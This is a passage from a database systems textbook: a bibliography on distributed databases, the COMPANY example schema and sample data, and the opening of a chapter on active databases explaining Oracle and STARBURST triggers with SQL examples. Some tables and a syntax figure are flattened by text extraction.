Pelagatti (1984a) and Ozsu and Valduriez (1999) are devoted to distributed databases. Peterson and Davie (2008), Tannenbaum (2003), and Stallings (2007) cover data communications and computer networks. Comer (2008) discusses networks and internets. Ozsu et al. (1994) has a collection of papers on distributed object management. Most of the research on distributed database design, query processing, and opti- mization occurred in the 1980s and 1990s; we quickly review the important refer- ences here. Distributed database design has been addressed in terms of horizontal and vertical fragmentation, allocation, and replication. Ceri et al. (1982) defined the concept of minterm horizontal fragments. Ceri et al. (1983) developed an integer programming-based optimization model for horizontal fragmentation and alloca- tion. Navathe et al. (1984) developed algorithms for vertical fragmentation based on attribute affinity and showed a variety of contexts for vertical fragment allocation. Wilson and Navathe (1986) present an analytical model for optimal allocation of fragments. Elmasri et al. (1987) discuss fragmentation for the ECR model; Karlapalem et al. (1996) discuss issues for distributed design of object databases. Navathe et al. (1996) discuss mixed fragmentation by combining horizontal and 924 Distributed Databases vertical fragmentation; Karlapalem et al. (1996) present a model for redesign of dis- tributed databases. Distributed query processing, optimization, and decomposition are discussed in Hevner and Yao (1979), Kerschberg et al. (1982), Apers et al. (1983), Ceri and Pelagatti (1984), and Bodorick et al. (1992). Bernstein and Goodman (1981) discuss the theory behind semijoin processing. Wong (1983) discusses the use of relation- ships in relation fragmentation. Concurrency control and recovery schemes are dis- cussed in Bernstein and Goodman (1981a). Kumar and Hsu (1998) compiles some articles related to recovery in distributed databases. Elections in distributed systems are discussed in Garcia-Molina (1982). Lamport (1978) discusses problems with generating unique timestamps in a distributed system. Rahimi and Haug (2007) discuss a more flexible way to construct query critical metadata for P2P databases. Ouzzani and Bouguettaya (2004) outline fundamental problems in distributed query processing over Web-based data sources. A concurrency control technique for replicated data that is based on voting is pre- sented by Thomas (1979). Gifford (1979) proposes the use of weighted voting, and Paris (1986) describes a method called voting with witnesses. Jajodia and Mutchler (1990) discuss dynamic voting. A technique called available copy is proposed by Bernstein and Goodman (1984), and one that uses the idea of a group is presented in ElAbbadi and Toueg (1988). Other work that discusses replicated data includes Gladney (1989), Agrawal and ElAbbadi (1990), ElAbbadi and Toueg (1989), Kumar and Segev (1993), Mukkamala (1989), and Wolfson and Milo (1991). Bassiouni (1988) discusses optimistic protocols for DDB concurrency control. Garcia-Molina (1983) and Kumar and Stonebraker (1987) discuss techniques that use the seman- tics of the transactions. Distributed concurrency control techniques based on lock- ing and distinguished copies are presented by Menasce et al. (1980) and Minoura and Wiederhold (1982). Obermark (1982) presents algorithms for distributed deadlock detection. In more recent work, Vadivelu et al. (2008) propose using backup mechanism and multilevel security to develop algorithms for improving concurrency. Madria et al. (2007) propose a mechanism based on a multiversion two-phase locking scheme and timestamping to address concurrency issues specific to mobile database systems. Boukerche and Tuck (2001) propose a technique that allows transactions to be out of order to a limited extent. They attempt to ease the load on the application developer by exploiting the network environment and pro- ducing a schedule equivalent to a temporally ordered serial schedule. Han et al. (2004) propose a deadlock-free and serializable extended Petri net model for Web- based distributed real-time databases. A survey of recovery techniques in distributed systems is given by Kohler (1981). Reed (1983) discusses atomic actions on distributed data. Bhargava (1987) presents an edited compilation of various approaches and techniques for concurrency and reliability in distributed systems. Federated database systems were first defined in McLeod and Heimbigner (1985). Techniques for schema integration in federated databases are presented by Elmasri et al. (1986), Batini et al. (1987), Hayne and Ram (1990), and Motro (1987). 925 Distributed Databases Elmagarmid and Helal (1988) and Gamal-Eldin et al. (1988) discuss the update problem in heterogeneous DDBSs. Heterogeneous distributed database issues are discussed in Hsiao and Kamel (1989). Sheth and Larson (1990) present an exhaus- tive survey of federated database management. Since late 1980s multidatabase systems and interoperability have become important topics. Techniques for dealing with semantic incompatibilities among multiple databases are examined in DeMichiel (1989), Siegel and Madnick (1991), Krishnamurthy et al. (1991), and Wang and Madnick (1989). Castano et al. (1998) present an excellent survey of techniques for analysis of schemas. Pitoura et al. (1995) discuss object orientation in multidatabase systems. Xiao et al. (2003) pro- pose an XML-based model for a common data model for multidatabase systems and present a new approach for schema mapping based on this model. Lakshmanan et al. (2001) propose extending SQL for interoperability and describe the architec- ture and algorithms for achieving the same. Transaction processing in multidatabases is discussed in Mehrotra et al. (1992), Georgakopoulos et al. (1991), Elmagarmid et al. (1990), and Brietbart et al. (1990), among others. Elmagarmid (1992) discuss transaction processing for advanced applications, including engineering applications discussed in Heiler et al. (1992). The workflow systems, which are becoming popular to manage information in com- plex organizations, use multilevel and nested transactions in conjunction with dis- tributed databases. Weikum (1991) discusses multilevel transaction management. Alonso et al. (1997) discuss limitations of current workflow systems. Lopes et al. (2009) propose that users define and execute their own workflows using a client- side Web browser. They attempt to leverage Web 2.0 trends to simplify the user’s work for workflow management. Jung and Yeom (2008) exploit data workflow to develop an improved transaction management system that provides simultaneous, transparent access to the heterogeneous storages that constitute the HVEM DataGrid. Deelman and Chervanak (2008) list the challenges in data-intensive sci- entific workflows. Specifically, they look at automated management of data, effi- cient mapping techniques, and user feedback issues in workflow mapping. They also argue for data reuse as an efficient means to manage data and present the chal- lenges therein. A number of experimental distributed DBMSs have been implemented. These include distributed INGRES by Epstein et al., (1978), DDTS by Devor and Weeldreyer, (1980), SDD-1 by Rothnie et al., (1980), System R* by Lindsay et al., (1984), SIRIUS-DELTA by Ferrier and Stangret, (1982), and MULTIBASE by Smith et al., (1981). The OMNIBASE system by Rusinkiewicz et al. (1988) and the Federated Information Base developed using the Candide data model by Navathe et al. (1994) are examples of federated DDBMSs. Pitoura et al. (1995) present a com- parative survey of the federated database system prototypes. Most commercial DBMS vendors have products using the client-server approach and offer distributed versions of their systems. Some system issues concerning client-server DBMS archi- tectures are discussed in Carey et al. (1991), DeWitt et al. (1990), and Wang and Rowe (1991). Khoshafian et al. (1992) discuss design issues for relational DBMSs in 926 the client-server environment. Client-server management issues are discussed in many books, such as Zantinge and Adriaans (1996). Di Stefano (2005) discusses data distribution issues specific to grid computing. A major part of this discussion may also apply to cloud computing. Distributed Databases DEPARTMENT Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno EMPLOYEE DEPT_LOCATIONS Dnumber Dlocation PROJECT Pname Pnumber Plocation Dnum WORKS_ON Essn Pno Hours DEPENDENT Essn Dependent_name Sex Bdate Relationship Dname Dnumber Mgr_ssn Mgr_start_date Figure A.1 Schema diagram for the COMPANY relational database schema. 927 DEPT_LOCATIONS Dnumber Houston Stafford Bellaire Sugarland Dlocation DEPARTMENT Dname Research Administration Headquarters 1 5 4 888665555 333445555 987654321 1981-06-19 1988-05-22 1995-01-01 Dnumber Mgr_ssn Mgr_start_date WORKS_ON Essn 123456789 123456789 666884444 453453453 453453453 333445555 333445555 333445555 333445555 999887777 999887777 987987987 987987987 987654321 987654321 888665555 3 1 2 2 1 2 30 30 30 10 10 3 10 20 20 20 40.0 32.5 7.5 10.0 10.0 10.0 10.0 20.0 20.0 30.0 5.0 10.0 35.0 20.0 15.0 NULL Pno Hours PROJECT Pname ProductX ProductY ProductZ Computerization Reorganization Newbenefits 3 1 2 30 10 20 5 5 5 4 4 1 Houston Bellaire Sugarland Stafford Stafford Houston Pnumber Plocation Dnum DEPENDENT 333445555 333445555 333445555 987654321 123456789 123456789 123456789 Joy Alice F M F M M F F 1986-04-05 1983-10-25 1958-05-03 1942-02-28 1988-01-04 1988-12-30 1967-05-05 Theodore Alice Elizabeth Abner Michael Spouse Daughter Son Daughter Spouse Spouse Son Dependent_name Sex Bdate Relationship EMPLOYEE Fname John Franklin Jennifer Alicia Ramesh Joyce James Ahmad Narayan English Borg Jabbar 666884444 453453453 888665555 987987987 F F M M M M M F 4 4 5 5 4 1 5 5 25000 43000 30000 40000 25000 55000 38000 25000 987654321 888665555 333445555 888665555 987654321 NULL 333445555 333445555 Zelaya Wallace Smith Wong 3321 Castle, Spring, TX 291 Berry, Bellaire, TX 731 Fondren, Houston, TX 638 Voss, Houston, TX 1968-01-19 1941-06-20 1965-01-09 1955-12-08 1969-03-29 1937-11-10 1962-09-15 1972-07-31 980 Dallas, Houston, TX 450 Stone, Houston, TX 975 Fire Oak, Humble, TX 5631 Rice, Houston, TX 999887777 987654321 123456789 333445555 Minit Lname Ssn Bdate Address Sex DnoSalary Super_ssn B T J S K A V E Houston 1 4 5 5 Essn 5 Figure A.2 One possible database state for the COMPANY relational database schema. 928 Enhanced Data Models for Advanced Applications As the use of database systems has grown, users havedemanded additional functionality from these software packages, with the purpose of making it easier to implement more advanced and complex user applications. Object-oriented databases and object- relational systems do provide features that allow users to extend their systems by specifying additional abstract data types for each application. However, it is quite useful to identify certain common features for some of these advanced applications and to create models that can represent them. Additionally, specialized storage structures and indexing methods can be implemented to improve the performance of these common features. Then the features can be implemented as abstract data types or class libraries and purchased separately from the basic DBMS software package. The term data blade has been used in Informix and cartridge in Oracle to refer to such optional submodules that can be included in a DBMS (database man- agement system) package. Users can utilize these features directly if they are suitable for their applications, without having to reinvent, reimplement, and reprogram such common features. This chapter introduces database concepts for some of the common features that are needed by advanced applications and are being used widely. We will cover active rules that are used in active database applications, temporal concepts that are used in temporal database applications, and, briefly, some of the issues involving spatial databases and multimedia databases. We will also discuss deductive databases. It is important to note that each of these topics is very broad, and we give only a brief introduction to each. In fact, each of these areas can serve as the sole topic of a com- plete book. In Section 1 we introduce the topic of active databases, which provide additional functionality for specifying active rules. These rules can be automatically triggered From Chapter 26 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 929 Enhanced Data Models for Advanced Applications by events that occur, such as database updates or certain times being reached, and can initiate certain actions that have been specified in the rule declaration to occur if certain conditions are met. Many commercial packages include some of the func- tionality provided by active databases in the form of triggers. Triggers are now part of the SQL-99 and later standards. In Section 2 we introduce the concepts of temporal databases, which permit the database system to store a history of changes, and allow users to query both current and past states of the database. Some temporal database models also allow users to store future expected information, such as planned schedules. It is important to note that many database applications are temporal, but they are often implemented without having much temporal support from the DBMS package—that is, the tem- poral concepts are implemented in the application programs that access the data- base. Section 3 gives a brief overview of spatial database concepts. We discuss types of spatial data, different kinds of spatial analyses, operations on spatial data, types of spatial queries, spatial data indexing, spatial data mining, and applications of spatial databases. Section 4 is devoted to multimedia database concepts. Multimedia databases pro- vide features that allow users to store and query different types of multimedia infor- mation, which includes images (such as pictures and drawings), video clips (such as movies, newsreels, and home videos), audio clips (such as songs, phone mes- sages, and speeches), and documents (such as books and articles). We discuss auto- matic analysis of images, object recognition in images, and semantic tagging of images. In Section 5 we discuss deductive databases,1 an area that is at the intersection of databases, logic, and artificial intelligence or knowledge bases. A deductive data- base system includes capabilities to define (deductive) rules, which can deduce or infer additional information from the facts that are stored in a database. Because part of the theoretical foundation for some deductive database systems is mathe- matical logic, such rules are often referred to as logic databases. Other types of sys- tems, referred to as expert database systems or knowledge-based systems, also incorporate reasoning and inferencing capabilities; such systems use techniques that were developed in the field of artificial intelligence, including semantic networks, frames, production systems, or rules for capturing domain-specific knowledge. Section 6 summarizes the chapter. Readers may choose to peruse the particular topics they are interested in, as the sec- tions in this chapter are practically independent of one another. 1Section 5 is only a summary of Deductive Databases; a chapter by this author is in a prior edition. 930 Enhanced Data Models for Advanced Applications 1 Active Database Concepts and Triggers Rules that specify actions that are automatically triggered by certain events have been considered important enhancements to database systems for quite some time. In fact, the concept of triggers—a technique for specifying certain types of active rules—has existed in early versions of the SQL specification for relational databases and triggers are now part of the SQL-99 and later standards. Commercial relational DBMSs—such as Oracle, DB2, and Microsoft SQLServer—have various versions of triggers available. However, much research into what a general model for active databases should look like has been done since the early models of triggers were proposed. In Section 1.1 we will present the general concepts that have been pro- posed for specifying rules for active databases. We will use the syntax of the Oracle commercial relational DBMS to illustrate these concepts with specific examples, since Oracle triggers are close to the way rules are specified in the SQL standard. Section 1.2 will discuss some general design and implementation issues for active databases. We give examples of how active databases are implemented in the STAR- BURST experimental DBMS in Section 1.3, since STARBURST provides for many of the concepts of generalized active databases within its framework. Section 1.4 discusses possible applications of active databases. Finally, Section 1.5 describes how triggers are declared in the SQL-99 standard. 1.1 Generalized Model for Active Databases and Oracle Triggers The model that has been used to specify active database rules is referred to as the Event-Condition-Action (ECA) model. A rule in the ECA model has three compo- nents: 1. The event(s) that triggers the rule: These events are usually database update operations that are explicitly applied to the database. However, in the general model, they could also be temporal events2 or other kinds of external events. 2. The condition that determines whether the rule action should be executed: Once the triggering event has occurred, an optional condition may be evalu- ated. If no condition is specified, the action will be executed once the event occurs. If a condition is specified, it is first evaluated, and only if it evaluates to true will the rule action be executed. 3. The action to be taken: The action is usually a sequence of SQL statements, but it could also be a database transaction or an external program that will be automatically executed. Let us consider some examples to illustrate these concepts. The examples are based on a much simplified variation of a COMPANY database application shown in Figure 1, with each employee having a name (Name), Social Security number (Ssn), 2An example would be a temporal event specified as a periodic time, such as: Trigger this rule every day at 5:30 A.M. 931 Enhanced Data Models for Advanced Applications Name Ssn Salary Dno Supervisor_ssn EMPLOYEE Dname Dno Total_sal Manager_ssn DEPARTMENT Figure 1 A simplified COMPANY database used for active rule examples. salary (Salary), department to which they are currently assigned (Dno, a foreign key to DEPARTMENT), and a direct supervisor (Supervisor_ssn, a (recursive) foreign key to EMPLOYEE). For this example, we assume that NULL is allowed for Dno, indicat- ing that an employee may be temporarily unassigned to any department. Each department has a name (Dname), number (Dno), the total salary of all employees assigned to the department (Total_sal), and a manager (Manager_ssn, which is a for- eign key to EMPLOYEE). Notice that the Total_sal attribute is really a derived attribute, whose value should be the sum of the salaries of all employees who are assigned to the particular depart- ment. Maintaining the correct value of such a derived attribute can be done via an active rule. First we have to determine the events that may cause a change in the value of Total_sal, which are as follows: 1. Inserting (one or more) new employee tuples 2. Changing the salary of (one or more) existing employees 3. Changing the assignment of existing employees from one department to another 4. Deleting (one or more) employee tuples In the case of event 1, we only need to recompute Total_sal if the new employee is immediately assigned to a department—that is, if the value of the Dno attribute for the new employee tuple is not NULL (assuming NULL is allowed for Dno). Hence, this would be the condition to be checked. A similar condition could be checked for event 2 (and 4) to determine whether the employee whose salary is changed (or who is being deleted) is currently assigned to a department. For event 3, we will always execute an action to maintain the value of Total_sal correctly, so no condition is needed (the action is always executed). The action for events 1, 2, and 4 is to automatically update the value of Total_sal for the employee’s department to reflect the newly inserted, updated, or deleted employee’s salary. In the case of event 3, a twofold action is needed: one to update the Total_sal of the employee’s old department and the other to update the Total_sal of the employee’s new department. The four active rules (or triggers) R1, R2, R3, and R4—corresponding to the above situation—can be specified in the notation of the Oracle DBMS as shown in Figure 2(a). Let us consider rule R1 to illustrate the syntax of creating triggers in Oracle. 932 Enhanced Data Models for Advanced Applications (a) R1: CREATE TRIGGER Total_sal1 AFTER INSERT ON EMPLOYEE FOR EACH ROW WHEN ( NEW.Dno IS NOT NULL ) UPDATE DEPARTMENT SET Total_sal = Total_sal + NEW.Salary WHERE Dno = NEW.Dno; R2: CREATE TRIGGER Total_sal2 AFTER UPDATE OF Salary ON EMPLOYEE FOR EACH ROW WHEN ( NEW.Dno IS NOT NULL ) UPDATE DEPARTMENT SET Total_sal = Total_sal + NEW.Salary – OLD.Salary WHERE Dno = NEW.Dno; R3: CREATE TRIGGER Total_sal3 AFTER UPDATE OF Dno ON EMPLOYEE FOR EACH ROW BEGIN UPDATE DEPARTMENT SET Total_sal = Total_sal + NEW.Salary WHERE Dno = NEW.Dno; UPDATE DEPARTMENT SET Total_sal = Total_sal – OLD.Salary WHERE Dno = OLD.Dno; END; R4: CREATE TRIGGER Total_sal4 AFTER DELETE ON EMPLOYEE FOR EACH ROW WHEN ( OLD.Dno IS NOT NULL ) UPDATE DEPARTMENT SET Total_sal = Total_sal – OLD.Salary WHERE Dno = OLD.Dno; (b) R5: CREATE TRIGGER Inform_supervisor1 BEFORE INSERT OR UPDATE OF Salary, Supervisor_ssn ON EMPLOYEE FOR EACH ROW WHEN ( NEW.Salary > ( SELECT Salary FROM EMPLOYEE

WHERE Ssn = NEW.Supervisor_ssn ) )
inform_supervisor(NEW.Supervisor_ssn, NEW.Ssn );

Figure 2
Specifying active rules
as triggers in Oracle
notation. (a) Triggers
for automatically main-
taining the consistency
of Total_sal of
DEPARTMENT. (b)
Trigger for comparing
an employee’s salary
with that of his or her
supervisor.

933

Enhanced Data Models for Advanced Applications

The CREATE TRIGGER statement specifies a trigger (or active rule) name—
Total_sal1 for R1. The AFTER clause specifies that the rule will be triggered after the
events that trigger the rule occur. The triggering events—an insert of a new
employee in this example—are specified following the AFTER keyword.3

The ON clause specifies the relation on which the rule is specified—EMPLOYEE for
R1. The optional keywords FOR EACH ROW specify that the rule will be triggered
once for each row that is affected by the triggering event.4

The optional WHEN clause is used to specify any conditions that need to be checked
after the rule is triggered, but before the action is executed. Finally, the action(s) to
be taken is (are) specified as a PL/SQL block, which typically contains one or more
SQL statements or calls to execute external procedures.

The four triggers (active rules) R1, R2, R3, and R4 illustrate a number of features of
active rules. First, the basic events that can be specified for triggering the rules are
the standard SQL update commands: INSERT, DELETE, and UPDATE. They are spec-
ified by the keywords INSERT, DELETE, and UPDATE in Oracle notation. In the case
of UPDATE, one may specify the attributes to be updated—for example, by writing
UPDATE OF Salary, Dno. Second, the rule designer needs to have a way to refer to the
tuples that have been inserted, deleted, or modified by the triggering event. The key-
words NEW and OLD are used in Oracle notation; NEW is used to refer to a newly
inserted or newly updated tuple, whereas OLD is used to refer to a deleted tuple or to
a tuple before it was updated.

Thus, rule R1 is triggered after an INSERT operation is applied to the EMPLOYEE
relation. In R1, the condition (NEW.Dno IS NOT NULL) is checked, and if it evaluates
to true, meaning that the newly inserted employee tuple is related to a department,
then the action is executed. The action updates the DEPARTMENT tuple(s) related to
the newly inserted employee by adding their salary (NEW.Salary) to the Total_sal
attribute of their related department.

Rule R2 is similar to R1, but it is triggered by an UPDATE operation that updates the
SALARY of an employee rather than by an INSERT. Rule R3 is triggered by an update
to the Dno attribute of EMPLOYEE, which signifies changing an employee’s assign-
ment from one department to another. There is no condition to check in R3, so the
action is executed whenever the triggering event occurs. The action updates both
the old department and new department of the reassigned employees by adding
their salary to Total_sal of their new department and subtracting their salary from
Total_sal of their old department. Note that this should work even if the value of Dno
is NULL, because in this case no department will be selected for the rule action.5

3As we will see, it is also possible to specify BEFORE instead of AFTER, which indicates that the rule is
triggered before the triggering event is executed.
4Again, we will see that an alternative is to trigger the rule only once even if multiple rows (tuples) are
affected by the triggering event.
5R1, R2, and R4 can also be written without a condition. However, it may be more efficient to execute
them with the condition since the action is not invoked unless it is required.

934

Enhanced Data Models for Advanced Applications

::= CREATE TRIGGER ( AFTER I BEFORE ) ON

[ FOR EACH ROW ]
[ WHEN ]
;

::= {OR }
::= INSERT I DELETE I UPDATE [ OF { , } ]
::=

Figure 3
A syntax summary for specifying triggers in the Oracle system (main options only).

It is important to note the effect of the optional FOR EACH ROW clause, which sig-
nifies that the rule is triggered separately for each tuple. This is known as a row-level
trigger. If this clause was left out, the trigger would be known as a statement-level
trigger and would be triggered once for each triggering statement. To see the differ-
ence, consider the following update operation, which gives a 10 percent raise to all
employees assigned to department 5. This operation would be an event that triggers
rule R2:

UPDATE EMPLOYEE
SET Salary = 1.1 * Salary
WHERE Dno = 5;

Because the above statement could update multiple records, a rule using row-level
semantics, such as R2 in Figure 2, would be triggered once for each row, whereas a
rule using statement-level semantics is triggered only once. The Oracle system allows
the user to choose which of the above options is to be used for each rule. Including
the optional FOR EACH ROW clause creates a row-level trigger, and leaving it out
creates a statement-level trigger. Note that the keywords NEW and OLD can only be
used with row-level triggers.

As a second example, suppose we want to check whenever an employee’s salary is
greater than the salary of his or her direct supervisor. Several events can trigger this
rule: inserting a new employee, changing an employee’s salary, or changing an
employee’s supervisor. Suppose that the action to take would be to call an external
procedure inform_supervisor,6 which will notify the supervisor. The rule could then
be written as in R5 (see Figure 2(b)).

Figure 3 shows the syntax for specifying some of the main options available in
Oracle triggers. We will describe the syntax for triggers in the SQL-99 standard in
Section 1.5.

6Assuming that an appropriate external procedure has been declared. This is a feature that is available in
SQL-99 and later standards.

935

1.2 Design and Implementation Issues
for Active Databases

The previous section gave an overview of some of the main concepts for specifying
active rules. In this section, we discuss some additional issues concerning how rules
are designed and implemented. The first issue concerns activation, deactivation,
and grouping of rules. In addition to creating rules, an active database system
should allow users to activate, deactivate, and drop rules by referring to their rule
names. A deactivated rule will not be triggered by the triggering event. This feature
allows users to selectively deactivate rules for certain periods of time when they are
not needed. The activate command will make the rule active again. The drop com-
mand deletes the rule from the system. Another option is to group rules into named
rule sets, so the whole set of rules can be activated, deactivated, or dropped. It is also
useful to have a command that can trigger a rule or rule set via an explicit PROCESS
RULES command issued by the user.

The second issue concerns whether the triggered action should be executed before,
after, instead of, or concurrently with the triggering event. A before trigger executes
the trigger before executing the event that caused the trigger. It can be used in appli-
cations such as checking for constraint violations. An after trigger executes the trig-
ger after executing the event, and it can be used in applications such as maintaining
derived data and monitoring for specific events and conditions. An instead of trig-
ger executes the trigger instead of executing the event, and it can be used in applica-
tions such as executing corresponding updates on base relations in response to an
event that is an update of a view.

A related issue is whether the action being executed should be considered as a separate
transaction or whether it should be part of the same transaction that triggered the
rule. We will try to categorize the various options. It is important to note that not all
options may be available for a particular active database system. In fact, most com-
mercial systems are limited to one or two of the options that we will now discuss.

Let us assume that the triggering event occurs as part of a transaction execution. We
should first consider the various options for how the triggering event is related to
the evaluation of the rule’s condition. The rule condition evaluation is also known as
rule consideration, since the action is to be executed only after considering whether
the condition evaluates to true or false. There are three main possibilities for rule
consideration:

1. Immediate consideration. The condition is evaluated as part of the same
transaction as the triggering event, and is evaluated immediately. This case
can be further categorized into three options:
■ Evaluate the condition before executing the triggering event.
■ Evaluate the condition after executing the triggering event.
■ Evaluate the condition instead of executing the triggering event.

2. Deferred consideration. The condition is evaluated at the end of the trans-
action that included the triggering event. In this case, there could be many
triggered rules waiting to have their conditions evaluated.

Enhanced Data Models for Advanced Applications

936

Enhanced Data Models for Advanced Applications

3. Detached consideration. The condition is evaluated as a separate transac-
tion, spawned from the triggering transaction.

The next set of options concerns the relationship between evaluating the rule condi-
tion and executing the rule action. Here, again, three options are possible:
immediate, deferred, or detached execution. Most active systems use the first
option. That is, as soon as the condition is evaluated, if it returns true, the action is
immediately executed.

The Oracle system (see Section 1.1) uses the immediate consideration model, but it
allows the user to specify for each rule whether the before or after option is to be
used with immediate condition evaluation. It also uses the immediate execution
model. The STARBURST system (see Section 1.3) uses the deferred consideration
option, meaning that all rules triggered by a transaction wait until the triggering
transaction reaches its end and issues its COMMIT WORK command before the rule
conditions are evaluated.7

Another issue concerning active database rules is the distinction between row-level
rules and statement-level rules. Because SQL update statements (which act as trig-
gering events) can specify a set of tuples, one has to distinguish between whether the
rule should be considered once for the whole statement or whether it should be con-
sidered separately for each row (that is, tuple) affected by the statement. The SQL-99
standard (see Section 1.5) and the Oracle system (see Section 1.1) allow the user to
choose which of the options is to be used for each rule, whereas STARBURST uses
statement-level semantics only. We will give examples of how statement-level trig-
gers can be specified in Section 1.3.

One of the difficulties that may have limited the widespread use of active rules, in
spite of their potential to simplify database and software development, is that there
are no easy-to-use techniques for designing, writing, and verifying rules. For exam-
ple, it is quite difficult to verify that a set of rules is consistent, meaning that two or
more rules in the set do not contradict one another. It is also difficult to guarantee
termination of a set of rules under all circumstances. To illustrate the termination

R1: CREATE TRIGGER T1
AFTER INSERT ON TABLE1
FOR EACH ROW

UPDATE TABLE2
SET Attribute1 = … ;

R2: CREATE TRIGGER T2
AFTER UPDATE OF Attribute1 ON TABLE2
FOR EACH ROW

INSERT INTO TABLE1 VALUES ( … );

Figure 4
An example to illus-
trate the termination
problem for active
rules.

7STARBURST also allows the user to start rule consideration explicitly via a PROCESS RULES com-
mand.

937

Enhanced Data Models for Advanced Applications

problem briefly, consider the rules in Figure 4. Here, rule R1 is triggered by an
INSERT event on TABLE1 and its action includes an update event on Attribute1 of
TABLE2. However, rule R2’s triggering event is an UPDATE event on Attribute1 of
TABLE2, and its action includes an INSERT event on TABLE1. In this example, it is
easy to see that these two rules can trigger one another indefinitely, leading to non-
termination. However, if dozens of rules are written, it is very difficult to determine
whether termination is guaranteed or not.

If active rules are to reach their potential, it is necessary to develop tools for the
design, debugging, and monitoring of active rules that can help users design and
debug their rules.

1.3 Examples of Statement-Level Active Rules
in STARBURST

We now give some examples to illustrate how rules can be specified in the STAR-
BURST experimental DBMS. This will allow us to demonstrate how statement-level
rules can be written, since these are the only types of rules allowed in STARBURST.

The three active rules R1S, R2S, and R3S in Figure 5 correspond to the first three
rules in Figure 2, but they use STARBURST notation and statement-level semantics.
We can explain the rule structure using rule R1S. The CREATE RULE statement
specifies a rule name—Total_sal1 for R1S. The ON clause specifies the relation on
which the rule is specified—EMPLOYEE for R1S. The WHEN clause is used to spec-
ify the events that trigger the rule.8 The optional IF clause is used to specify any
conditions that need to be checked. Finally, the THEN clause is used to specify the
actions to be taken, which are typically one or more SQL statements.

In STARBURST, the basic events that can be specified for triggering the rules are the
standard SQL update commands: INSERT, DELETE, and UPDATE. These are speci-
fied by the keywords INSERTED, DELETED, and UPDATED in STARBURST nota-
tion. Second, the rule designer needs to have a way to refer to the tuples that have
been modified. The keywords INSERTED, DELETED, NEW-UPDATED, and OLD-
UPDATED are used in STARBURST notation to refer to four transition tables (rela-
tions) that include the newly inserted tuples, the deleted tuples, the updated tuples
before they were updated, and the updated tuples after they were updated, respec-
tively. Obviously, depending on the triggering events, only some of these transition
tables may be available. The rule writer can refer to these tables when writing the
condition and action parts of the rule. Transition tables contain tuples of the same
type as those in the relation specified in the ON clause of the rule—for R1S, R2S,
and R3S, this is the EMPLOYEE relation.

In statement-level semantics, the rule designer can only refer to the transition tables
as a whole and the rule is triggered only once, so the rules must be written differ-
ently than for row-level semantics. Because multiple employee tuples may be

8Note that the WHEN keyword specifies events in STARBURST but is used to specify the rule condition
in SQL and Oracle triggers.

938

Enhanced Data Models for Advanced Applications

R1S: CREATE RULE Total_sal1 ON EMPLOYEE
WHEN INSERTED
IF EXISTS ( SELECT * FROM INSERTED WHERE Dno IS NOT NULL )
THEN UPDATE DEPARTMENT AS D

SET D.Total_sal = D.Total_sal +
( SELECT SUM (I.Salary) FROM INSERTED AS I WHERE D.Dno = I.Dno )

WHERE D.Dno IN ( SELECT Dno FROM INSERTED );

R2S: CREATE RULE Total_sal2 ON EMPLOYEE
WHEN UPDATED ( Salary )
IF EXISTS ( SELECT * FROM NEW-UPDATED WHERE Dno IS NOT NULL )

OR EXISTS ( SELECT * FROM OLD-UPDATED WHERE Dno IS NOT NULL )
THEN UPDATE DEPARTMENT AS D

SET D.Total_sal = D.Total_sal +
( SELECT SUM (N.Salary) FROM NEW-UPDATED AS N

WHERE D.Dno = N.Dno ) –
( SELECT SUM (O.Salary) FROM OLD-UPDATED AS O

WHERE D.Dno = O.Dno )
WHERE D.Dno IN ( SELECT Dno FROM NEW-UPDATED ) OR

D.Dno IN ( SELECT Dno FROM OLD-UPDATED );

R3S: CREATE RULE Total_sal3 ON EMPLOYEE
WHEN UPDATED ( Dno )
THEN UPDATE DEPARTMENT AS D

SET D.Total_sal = D.Total_sal +
( SELECT SUM (N.Salary) FROM NEW-UPDATED AS N

WHERE D.Dno = N.Dno )
WHERE D.Dno IN ( SELECT Dno FROM NEW-UPDATED );
UPDATE DEPARTMENT AS D
SET D.Total_sal = Total_sal –

( SELECT SUM (O.Salary) FROM OLD-UPDATED AS O
WHERE D.Dno = O.Dno )

WHERE D.Dno IN ( SELECT Dno FROM OLD-UPDATED );

Figure 5
Active rules using statement-level semantics in STARBURST notation.

inserted in a single insert statement, we have to check if at least one of the newly
inserted employee tuples is related to a department. In R1S, the condition

EXISTS (SELECT * FROM INSERTED WHERE Dno IS NOT NULL )

is checked, and if it evaluates to true, then the action is executed. The action updates
in a single statement the DEPARTMENT tuple(s) related to the newly inserted
employee(s) by adding their salaries to the Total_sal attribute of each related depart-
ment. Because more than one newly inserted employee may belong to the same

939

Enhanced Data Models for Advanced Applications

department, we use the SUM aggregate function to ensure that all their salaries are
added.

Rule R2S is similar to R1S, but is triggered by an UPDATE operation that updates the
salary of one or more employees rather than by an INSERT. Rule R3S is triggered by
an update to the Dno attribute of EMPLOYEE, which signifies changing one or more
employees’ assignment from one department to another. There is no condition in
R3S, so the action is executed whenever the triggering event occurs.9 The action
updates both the old department(s) and new department(s) of the reassigned
employees by adding their salary to Total_sal of each new department and subtract-
ing their salary from Total_sal of each old department.

In our example, it is more complex to write the statement-level rules than the row-
level rules, as can be illustrated by comparing Figures 2 and 5. However, this is not a
general rule, and other types of active rules may be easier to specify when using
statement-level notation than when using row-level notation.

The execution model for active rules in STARBURST uses deferred consideration.
That is, all the rules that are triggered within a transaction are placed in a set—
called the conflict set—which is not considered for evaluation of conditions and
execution until the transaction ends (by issuing its COMMIT WORK command).
STARBURST also allows the user to explicitly start rule consideration in the middle
of a transaction via an explicit PROCESS RULES command. Because multiple rules
must be evaluated, it is necessary to specify an order among the rules. The syntax for
rule declaration in STARBURST allows the specification of ordering among the
rules to instruct the system about the order in which a set of rules should be consid-
ered.10 Additionally, the transition tables—INSERTED, DELETED, NEW-UPDATED,
and OLD-UPDATED—contain the net effect of all the operations within the transac-
tion that affected each table, since multiple operations may have been applied to
each table during the transaction.

1.4 Potential Applications for Active Databases
We now briefly discuss some of the potential applications of active rules. Obviously,
one important application is to allow notification of certain conditions that occur.
For example, an active database may be used to monitor, say, the temperature of an
industrial furnace. The application can periodically insert in the database the tem-
perature reading records directly from temperature sensors, and active rules can be
written that are triggered whenever a temperature record is inserted, with a condi-
tion that checks if the temperature exceeds the danger level, and results in the action
to raise an alarm.

9As in the Oracle examples, rules R1S and R2S can be written without a condition. However, it may be
more efficient to execute them with the condition since the action is not invoked unless it is required.
